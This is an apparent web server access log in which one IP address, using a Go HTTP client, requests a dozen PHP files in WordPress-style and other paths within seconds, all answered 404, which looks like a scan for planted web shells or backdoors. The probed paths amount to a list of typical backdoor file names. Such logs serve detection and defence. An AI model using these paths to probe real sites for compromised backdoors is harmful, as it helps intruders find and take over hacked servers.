84.247.150.175 - - [24/Nov/2024:23:34:28 +0100] "GET /web.php HTTP/1.1" 404 296 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:29 +0100] "GET /wp-includes/fonts/wp-login.php HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:29 +0100] "GET /wp-content/classwithtostring.php HTTP/1.1" 404 311 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:30 +0100] "GET /wp-includes/Text/about.php HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:30 +0100] "GET /wp-admin/css/colors/coffee/index.php HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:30 +0100] "GET /wp-content/tmpls.php HTTP/1.1" 404 304 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:31 +0100] "GET /cjfuns.php HTTP/1.1" 404 299 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:31 +0100] "GET /wp-admin/css/about.php HTTP/1.1" 404 306 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:31 +0100] "GET /1.php?apx=upx HTTP/1.1" 404 295 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:32 +0100] "GET /.well-known/pki-validation/xmrlpc.php HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:32 +0100] "GET /jp.php HTTP/1.1" 404 295 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:33 +0100] "GET /wp-content/uploads/wp-login.php HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
